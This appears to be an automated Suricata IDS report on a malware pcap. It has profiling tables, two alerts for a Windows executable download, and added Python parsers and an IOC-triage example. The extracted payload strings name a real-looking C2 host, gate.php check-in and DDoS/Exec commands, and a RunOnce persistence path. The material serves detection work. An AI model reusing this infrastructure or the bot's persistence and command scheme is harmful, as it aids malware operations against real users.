16/9/2019 -- 10:50:38 - <Info> - stats output device (regular) initialized: stats.log
16/9/2019 -- 10:50:38 - <Config> - AutoFP mode using "Hash" flow load balancer
16/9/2019 -- 10:50:38 - <Info> - reading pcap file /var/pcap/09162019.1050-pcap_4.pcap
16/9/2019 -- 10:50:38 - <Config> - using 1 flow manager threads
16/9/2019 -- 10:50:38 - <Config> 

This file has been truncated.


keyword_perf.log - (13570 bytes) - download
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 9/16/2019 -- 10:50:40
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             53134044        9955            9955            44056           5337.00         5337.00         0.00           
  content          94291450        15627           10533           431646          6033.00         6097.00         5902.00        
  pcre             22743962        3119            395             93604           7292.00         6470.00         7411.00        
  byte_test        1323626         253             161             26786           5231.00         5335.00         5050.00        
  byte_jump        544786          106             106             24974           5139.00         5139.00         0.00           
  isdataat         39396           8               2               6086            4924.00         4527.00         5057.00        
  flowbits         3878376         739             136             119422          5248.00         6347.00         5000.00        
  urilen           14034796        2722            1242            37976           5156.00         5170.00         5143.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             53134044        9955            9955            44056           5337.00         5337.00         0.00           
  flowbits         3398910         656             53              119422          5181.00         7241.00         5000.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7505788         1039            734             431646          7224.00         7125.00         7460.00        
  pcre             896952          98              0               64108           9152.00         0.00            9152.00        
  byte_test        1201840         227             161             26786           5294.00         5335.00         5194.00        
  byte_jump        323574          60              60              24974           5392.00         5392.00         0.00           
  isdataat         39396           8               2               6086            4924.00         4527.00         5057.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         479466          83              83              22330           5776.00         5776.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          22266274        3677            2566            48034           6055.00         6054.00         6056.00        
  pcre             15892810        2171            0               93604           7320.00         0.00            7320.00        
  urilen           14034796        2722            1242            37976           5156.00         5170.00         5143.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          407936          79              0               6522            5163.00         0.00            5163.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2216596         222             68              200912          9984.00         9729.00         10097.00       
  byte_test        121786          26              0               5720            4684.00         0.00            4684.00        
  byte_jump        221212          46              46              5800            4808.00         4808.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          39577052        6651            4889            144890          5950.00         6054.00         5660.00        
  pcre             4720082         661             237             70050           7140.00         6838.00         7309.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5817774         1035            584             69386           5621.00         5754.00         5448.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          379352          58              54              38978           6540.00         6621.00         5452.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11782           2               0               5942            5891.00         0.00            5891.00        
  pcre             59928           2               0               51972           29964.00        0.00            29964.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2988942         542             162             25360           5514.00         5812.00         5387.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12492336        2212            1422            42002           5647.00         5796.00         5379.00        
  pcre             934908          158             158             27558           5917.00         5917.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             239282          29              0               31254           8251.00         0.00            8251.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10594           2               0               5428            5297.00         0.00            5297.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          617024          108             54              23192           5713.00         5387.00         6038.00        
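The keyword_perf.log above is Suricata's per-keyword rule profiling (enabled with --enable-profiling at build time and profiling.keywords in suricata.yaml): ticks spent, how often each keyword was evaluated per buffer, and how often it matched. Read it as a cost/yield table: the "total" section ranks keywords by where the detect engine burned its time, and a per-buffer row with thousands of checks and zero matches (here pcre on http_uri: 2171 checks, 0 matches, 15.9M ticks) is pure overhead on this traffic and the first place to look when tuning. Note that the numbers are specific to this pcap; zero matches means nothing in this capture hit, not that the rule is useless. The following parser and ranking is an added example, not part of the page or of IDSDeathBlossom; the sample rows are copied from the log shown above, with the three sections it uses chosen for brevity.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Sample input: rows copied from the keyword_perf.log on this page (three of
# its "Stats for:" sections). The numbers are the page's own, not invented.
SAMPLE_KEYWORD_PERF = """\
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- ---------------
  flow             53134044        9955            9955            44056           5337.00         5337.00         0.00
  content          94291450        15627           10533           431646          6033.00         6097.00         5902.00
  pcre             22743962        3119            395             93604           7292.00         6470.00         7411.00
  byte_test        1323626         253             161             26786           5231.00         5335.00         5050.00
  byte_jump        544786          106             106             24974           5139.00         5139.00         0.00
  isdataat         39396           8               2               6086            4924.00         4527.00         5057.00
  flowbits         3878376         739             136             119422          5248.00         6347.00         5000.00
  urilen           14034796        2722            1242            37976           5156.00         5170.00         5143.00
  Stats for: http_uri
  content          22266274        3677            2566            48034           6055.00         6054.00         6056.00
  pcre             15892810        2171            0               93604           7320.00         0.00            7320.00
  urilen           14034796        2722            1242            37976           5156.00         5170.00         5143.00
  Stats for: http_host
  pcre             239282          29              0               31254           8251.00         0.00            8251.00
"""


@dataclass(frozen=True)
class KeywordRow:
    buffer: str        # the "Stats for:" section: total, http_uri, file_data, ...
    keyword: str
    ticks: int
    checks: int
    matches: int
    max_ticks: int
    avg: float
    avg_match: float
    avg_no_match: float

    @property
    def match_rate(self) -> float:
        return self.matches / self.checks if self.checks else 0.0


SECTION_RE = re.compile(r"^\s*Stats for:\s*(.+?)\s*$")   # "packet/stream payload" has a space
ROW_RE = re.compile(
    r"^\s*(?P<kw>[A-Za-z_][\w.]*)\s+(?P<ticks>\d+)\s+(?P<checks>\d+)\s+(?P<matches>\d+)\s+"
    r"(?P<max>\d+)\s+(?P<avg>[\d.]+)\s+(?P<avgm>[\d.]+)\s+(?P<avgnm>[\d.]+)\s*$"
)


def parse_keyword_perf(text: str) -> List[KeywordRow]:
    """Parse every data row of a keyword_perf.log, tagged with its section."""
    rows: List[KeywordRow] = []
    section = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = ROW_RE.match(line)
        if m and section:   # Date, header and dashed lines never match ROW_RE
            rows.append(KeywordRow(
                section, m["kw"], int(m["ticks"]), int(m["checks"]), int(m["matches"]),
                int(m["max"]), float(m["avg"]), float(m["avgm"]), float(m["avgnm"])))
    return rows


def cost_ranking(rows: List[KeywordRow], buffer: str = "total") -> List[Tuple[str, int, float, float]]:
    """(keyword, ticks, share of the section's ticks, match rate), most expensive first."""
    sel = [r for r in rows if r.buffer == buffer]
    total = sum(r.ticks for r in sel) or 1
    return [(r.keyword, r.ticks, r.ticks / total, r.match_rate)
            for r in sorted(sel, key=lambda r: r.ticks, reverse=True)]


def zero_yield_hotspots(rows: List[KeywordRow], min_checks: int = 50) -> List[KeywordRow]:
    """Keyword/buffer pairs evaluated at least min_checks times that never matched."""
    return sorted((r for r in rows
                   if r.buffer != "total" and r.matches == 0 and r.checks >= min_checks),
                  key=lambda r: r.ticks, reverse=True)


if __name__ == "__main__":
    perf = parse_keyword_perf(SAMPLE_KEYWORD_PERF)
    for kw, ticks, share, rate in cost_ranking(perf):
        print(f"{kw:<10} {ticks:>10} ticks  {share:5.1%} of total  match rate {rate:.2f}")
    for r in zero_yield_hotspots(perf):
        print(f"no-yield: {r.keyword} on {r.buffer}: {r.checks} checks, {r.ticks} ticks")
```

The hotspot list is the actionable part: a pcre that is checked thousands of times per buffer and never matches is a rule (or group of rules) whose fast-pattern content is too weak to keep the regex from being reached, so the fix is in the rule's content/fast_pattern selection, not in the regex itself.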


suricata-4.0.0-etpro-all-alert-2019-09-16-T-10-50-40-09162019.1050-pcap_4.pcap.txt - (438 bytes) - download
09/11/2019-14:45:13.689959  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 77.222.62.31:80 -> 192.168.56.101:49175
09/11/2019-14:45:50.607163  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 77.222.62.31:80 -> 192.168.56.101:49220
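The two lines above are Suricata's fast.log format: packet timestamp, [gid:sid:rev], rule message, classification, priority, protocol, and src:port -> dst:port. The timestamps (09/11) predate the run date (09/16) because in -r mode Suricata stamps alerts with the packet time from the pcap, not the wall clock. Both alerts are the same signature from the same server to the same client on two successive client ports, i.e. the executable was fetched twice about 37 seconds apart. The parser and per-signature rollup below is an added example, not part of the page or of IDSDeathBlossom; it handles lines with no Classification field (rules without a classtype) and splits endpoints on the last colon, since fast.log prints IPv6 addresses without brackets. The sample input is the two lines above, verbatim.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Tuple

# Sample input: the two fast.log lines shown above, verbatim.
SAMPLE_FAST_LOG = """\
09/11/2019-14:45:13.689959  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 77.222.62.31:80 -> 192.168.56.101:49175
09/11/2019-14:45:50.607163  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 77.222.62.31:80 -> 192.168.56.101:49220
"""

FAST_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d{6})\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<cls>[^\]]*)\]\s+)?"   # absent when the rule has no classtype
    r"\[Priority:\s+(?P<pri>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s*$"
)


@dataclass(frozen=True)
class Alert:
    ts: datetime          # packet time from the capture, not when Suricata ran
    gid: int
    sid: int
    rev: int
    msg: str
    classification: str
    priority: int
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def _split_endpoint(ep: str) -> Tuple[str, int]:
    # fast.log writes addr:port with no brackets, so split on the LAST colon;
    # that keeps IPv6 addresses such as 2001:db8::1:443 intact.
    host, port = ep.rsplit(":", 1)
    return host, int(port)


def parse_fast_log(text: str) -> List[Alert]:
    alerts: List[Alert] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = FAST_RE.match(line)
        if not m:
            raise ValueError(f"unparsed fast.log line: {line!r}")
        src_ip, src_port = _split_endpoint(m["src"])
        dst_ip, dst_port = _split_endpoint(m["dst"])
        alerts.append(Alert(
            ts=datetime.strptime(m["ts"], "%m/%d/%Y-%H:%M:%S.%f"),
            gid=int(m["gid"]), sid=int(m["sid"]), rev=int(m["rev"]),
            msg=m["msg"], classification=m["cls"] or "", priority=int(m["pri"]),
            proto=m["proto"], src_ip=src_ip, src_port=src_port,
            dst_ip=dst_ip, dst_port=dst_port))
    return alerts


def summarize(alerts: List[Alert]) -> Dict[Tuple[int, str, str], dict]:
    """Collapse repeated firings of one signature between one server/client pair."""
    out: Dict[Tuple[int, str, str], dict] = {}
    for a in alerts:
        key = (a.sid, a.src_ip, a.dst_ip)
        s = out.setdefault(key, {"msg": a.msg, "priority": a.priority, "count": 0,
                                 "first": a.ts, "last": a.ts, "dst_ports": set()})
        s["count"] += 1
        s["first"], s["last"] = min(s["first"], a.ts), max(s["last"], a.ts)
        s["dst_ports"].add(a.dst_port)
    for s in out.values():
        s["span_seconds"] = (s["last"] - s["first"]).total_seconds()
    return out


if __name__ == "__main__":
    for (sid, src, dst), s in summarize(parse_fast_log(SAMPLE_FAST_LOG)).items():
        print(f"sid {sid} {src} -> {dst}: {s['count']}x over {s['span_seconds']:.1f}s, "
              f"client ports {sorted(s['dst_ports'])}: {s['msg']}")
```

The rollup key is (sid, server, client) rather than the full 5-tuple so that repeated fetches from the same host show up as one line with a count and a time span; that is the view an analyst wants before pivoting to the eve.json http records for the URI and the file hash.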


unified2.alert.1568631038 - (8443 bytes) - download
[unified2 is a binary format; the 8443-byte file is not reproducible as text and its non-printable bytes are omitted here. What survives are the printable strings of the captured packet payload, i.e. part of the Windows PE whose download raised the two alerts above. The file holds two records with overlapping payload (one per alert); each string is listed once, in order of first appearance. The 0xFFFFFFFF-prefixed, length-framed string constants and the "Runtime error ... at" message are Delphi runtime conventions.]

Date/time format strings: m/d/yy, mmmm d, yyyy, am, pm, h, hh, AMPM, :mm, :mm:ss
kernel32.dll
GetDiskFreeSpaceExA
0x
http://google.com
http://InetURL:/1.0
200
302
Software\Microsoft\Windows\CurrentVersion\RunOnce
perflog\service.exe
AutoUpdate
http://x0x22a3720.temp.swtest.ru/
perflog\
service.exe
ping
gate.php?status=Free&id=
temp.tmp
command.txt
?id=
command.tmp
ping.txt
ping.tmp
gate.php?status=DDoS&id=
?rnd=
file.exe
start
f.exe
gate.php?status=Exec
&id=
perflog\service.exe
Error
Runtime error     at 00000000
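The unified2 record carries the raw packet, so the payload strings above are the first triage artefact an analyst pulls from it: a check-in URL (gate.php?status=...), a RunOnce persistence key paired with a dropped executable path (perflog\service.exe), and the DDoS/Exec command vocabulary. The code below is an added example, not part of the page or of IDSDeathBlossom, and it does not parse the unified2 container itself: it applies a strings(1)-style extractor and IOC classification to a constructed byte blob that frames a few of the strings listed above the way Delphi emits string constants (0xFFFFFFFF refcount, 32-bit length, bytes, NUL) between opaque filler bytes. The blob, the regexes and the persistence heuristic are all assumptions for illustration, not the real record.

```python
import re
from typing import Dict, List


def _delphi_const(s: bytes) -> bytes:
    # Framing of a Delphi AnsiString constant: 0xFFFFFFFF refcount, 32-bit
    # little-endian length, the bytes, a terminating NUL (the "ÿÿÿÿ" runs
    # visible before each string in the dump above). Constructed for the sample.
    return b"\xff\xff\xff\xff" + len(s).to_bytes(4, "little") + s + b"\x00"


# Constructed sample payload: strings copied from the dump above, framed as the
# compiler would emit them, with opaque filler bytes in between. It is NOT the
# real packet record, which this page only shows in garbled form.
SAMPLE_PAYLOAD = (
    b"\x55\x8b\xec\x33\xc0\x55\x68\xd1\x8b\x40\x00"
    + _delphi_const(b"http://google.com")
    + _delphi_const(b"http://InetURL:/1.0")
    + _delphi_const(b"200") + _delphi_const(b"302")
    + b"\x8b\xd8\x85\xdb\x74\x10"
    + _delphi_const(b"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce")
    + _delphi_const(b"perflog\\service.exe")
    + _delphi_const(b"AutoUpdate")
    + _delphi_const(b"http://x0x22a3720.temp.swtest.ru/")
    + _delphi_const(b"gate.php?status=Free&id=")
    + _delphi_const(b"gate.php?status=DDoS&id=")
    + _delphi_const(b"file.exe") + _delphi_const(b"f.exe")
    + b"kernel32.dll\x00GetDiskFreeSpaceExA\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Printable-ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Classification patterns (assumptions for this example, tune for real triage).
URL_RE = re.compile(r"https?://[\w.-]+(?::\d+)?(?:/[^\s\"'<>]*)?", re.I)
C2_URI_RE = re.compile(r"[\w/.-]*\.php\?[\w=&%.-]*")      # gate.php?status=...&id=
RUNKEY_RE = re.compile(
    r"Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once|Services|ServicesOnce)?\b", re.I)
BINARY_RE = re.compile(r"(?:[\w.-]+\\)*[\w.-]+\.(?:exe|dll)\b", re.I)


def classify_iocs(strings: List[str]) -> Dict[str, List[str]]:
    found = {"urls": set(), "c2_uris": set(), "run_keys": set(), "binaries": set()}
    for s in strings:
        found["urls"].update(URL_RE.findall(s))
        found["c2_uris"].update(C2_URI_RE.findall(s))
        found["run_keys"].update(RUNKEY_RE.findall(s))
        found["binaries"].update(BINARY_RE.findall(s))
    return {k: sorted(v) for k, v in found.items()}


def triage(data: bytes) -> Dict[str, object]:
    """Strings -> IOC buckets, plus a flag for the Run-key + dropped-exe persistence pattern."""
    iocs = classify_iocs(extract_strings(data))
    persistence = bool(iocs["run_keys"]) and any(
        b.lower().endswith(".exe") for b in iocs["binaries"])
    return {"iocs": iocs, "persistence_suspected": persistence}


if __name__ == "__main__":
    result = triage(SAMPLE_PAYLOAD)
    for bucket, items in result["iocs"].items():
        print(f"{bucket}: {items}")
    print("persistence suspected:", result["persistence_suspected"])
```

On a real unified2 file the payload comes from the packet record that follows each event record; Suricata's eve.json files/fileinfo output (enabled above as the 'files' module) gives the same download as a complete file with its hash, which is the better source for hashing and sandboxing. The string pass is still worth running on the alert payload because it works on partial captures and needs no file extraction configuration.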


IDSDeathBlossom.py.log - (1146 bytes) - download
2019-09-16 10:50:13,993 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-09-16 10:50:14,718 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-09-16 10:50:14,718 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-09-16 10:50:14,718 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-09-16 10:50:14,718 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-09-16 10:50:14,719 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/4af40c2c9c43f7fcc993afd736c52ccf56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09162019.1050-pcap_4.pcap -vvv -k none
2019-09-16 10:50:40,526 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-09-16 10:50:40,527 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 26.5426719189